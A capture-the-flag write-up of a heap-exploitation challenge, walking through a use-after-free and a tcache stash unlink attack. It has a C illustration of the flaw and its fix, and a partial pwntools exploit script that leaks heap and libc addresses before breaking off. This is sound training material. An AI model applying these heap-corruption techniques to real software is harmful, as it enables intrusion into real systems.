[2020 Spring Festival Red Packet Challenges] 3 (Tcache stash unlink attack)
Canary is not enabled, so could there be a stack overflow?
execve is disabled as well.
Delete leaves a dangling pointer (the slot is not cleared after free, so show/edit still reach the freed chunk).
Add only allows the sizes 0x10, 0xf0, 0x300 and 0x400.
It allocates with calloc, which means add never takes a chunk from tcache.
Add can be used 0x1c (28) times, edit only once.
The program has a backdoor that happens to let us overwrite the return address.
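The dangling pointer noted above is the root cause the rest of the writeup builds on. The following C snippet is an added illustration, not code from the challenge binary: a constructed slot table mimicking the red-packet array, a delete that frees without clearing the slot (the pattern described above) next to a hardened delete that nulls it, and a liveness check that show/edit should gate on. The names `packets`, `delete_dangling`, `delete_safe` and `slot_live` are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NSLOTS 16

/* Constructed slot table standing in for the binary's red-packet array. */
static char *packets[NSLOTS];

/* Allocate with calloc like the challenge does; refuse an occupied slot. */
static int add(int idx, size_t size, const char *content) {
    if (idx < 0 || idx >= NSLOTS || packets[idx] != NULL || size == 0) return -1;
    packets[idx] = calloc(1, size);
    if (packets[idx] == NULL) return -1;
    strncpy(packets[idx], content, size - 1);
    return 0;
}

/* Pattern described in the writeup: free() without clearing the slot.
 * The table still holds the old address, so a later show/edit on this
 * index would read or write freed heap memory (use-after-free). */
static void delete_dangling(int idx) {
    if (idx < 0 || idx >= NSLOTS || packets[idx] == NULL) return;
    free(packets[idx]);
}

/* Hardened version: clear the slot so show/edit reject the index and a
 * second delete cannot double-free the same chunk. */
static void delete_safe(int idx) {
    if (idx < 0 || idx >= NSLOTS || packets[idx] == NULL) return;
    free(packets[idx]);
    packets[idx] = NULL;
}

/* 1 if the slot currently points at a live allocation, else 0.
 * show/edit must check this before touching packets[idx]. */
static int slot_live(int idx) {
    return idx >= 0 && idx < NSLOTS && packets[idx] != NULL;
}

/* After the dangling delete the slot still looks live: the stale
 * pointer is only compared, never dereferenced, so this is safe to run. */
int demo_dangling(void) {
    add(0, 0x100, "Chunk0");
    delete_dangling(0);
    int still_live = slot_live(0);
    packets[0] = NULL;          /* drop the stale pointer; nothing is freed twice */
    return still_live;          /* 1 */
}

/* After the safe delete the slot is rejected. */
int demo_safe(void) {
    add(1, 0x100, "Chunk1");
    delete_safe(1);
    return slot_live(1);        /* 0 */
}

int main(void) {
    printf("dangling delete leaves slot live: %d\n", demo_dangling());
    printf("safe delete leaves slot live:     %d\n", demo_safe());
    return 0;
}
```

The one-line fix (`packets[idx] = NULL` after `free`) is what turns every later show/edit on that index from a use-after-free into a rejected request.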
The exploitation approach is as follows:
- Add and free 7 times to fill the tcache bin for chunks of size 0x410, and use show to leak heap_base
- Put 6 chunks of size 0x100 into tcache
- Add a chunk of size 0x410 and free it to obtain a libc address
- Put 2 more chunks of size 0x100 into tcache
- Use the UAF to change the bk of smallbin2 (the chunk that entered the smallbin later) to `qword_4058 + 0x800 - 0x10`
- Request a chunk of size 0x100, so that a large value gets written at `qword_4058 + 0x800 - 0x10`
- Request another chunk of size 0x410 and write the ROP chain into it
- Use the backdoor plus a stack pivot to get the flag
Exp:

```python
from pwn import *

r = remote("node3.buuoj.cn", 28846)
#r = process("./RedPacket_SoEasyPwn1/RedPacket_SoEasyPwn1")
context(log_level='debug', arch='amd64', os='linux')
DEBUG = 0
if DEBUG:
    gdb.attach(r, '''
    where
    ''')
elf = ELF("./RedPacket_SoEasyPwn1/RedPacket_SoEasyPwn1")
libc = ELF('./libc/libc-2.29.so')
one_gadget_19 = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]
menu = "Your input: "

def add(index, choice, content):
    # choice picks the size: 1 -> 0x10, 2 -> 0xf0, 3 -> 0x300, 4 -> 0x400 (calloc'd)
    r.recvuntil(menu)
    r.sendline('1')
    r.recvuntil("Please input the red packet idx: ")
    r.sendline(str(index))
    r.recvuntil("How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ")
    r.sendline(str(choice))
    r.recvuntil("Please input content: ")
    r.send(content)

def delete(index):
    # frees the chunk but leaves the slot pointer in place (the UAF)
    r.recvuntil(menu)
    r.sendline('2')
    r.recvuntil("Please input the red packet idx: ")
    r.sendline(str(index))

def edit(index, content):
    # only one edit is allowed by the program
    r.recvuntil(menu)
    r.sendline('3')
    r.recvuntil("Please input the red packet idx: ")
    r.sendline(str(index))
    r.recvuntil("Please input content: ")
    r.send(content)

def show(index):
    r.recvuntil(menu)
    r.sendline('4')
    r.recvuntil("Please input the red packet idx: ")
    r.sendline(str(index))

# fill the tcache bin for size 0x410 (7 entries)
for i in range(7):
    add(0, 4, 'Chunk0')
    delete(0)
# put 6 chunks of size 0x100 into tcache
for i in range(6):
    add(1, 2, 'Chunk1')
    delete(1)
# the freed chunk's tcache next pointer leaks a heap address
show(0)
last_chunk_addr = u64(r.recvuntil('\n').strip().ljust(8, '\x00'))
heap_addr = last_chunk_addr - 0x26C0
success("heap_base:" + hex(heap_addr))
# with its tcache bin full, a freed 0x410 chunk lands in the unsorted bin;
# Chunk3 sits below it so it does not merge into the top chunk
add(2, 4, 'Chunk2')
add(3, 3, 'Chunk3')
delete(2)
# the unsorted bin fd points into main_arena; __malloc_hook lies 0x10 before it
show(2)
malloc_hook = u64(r.recvuntil('\n').strip().ljust(8, '\x00')) - 0x60 - 0x10
libc
```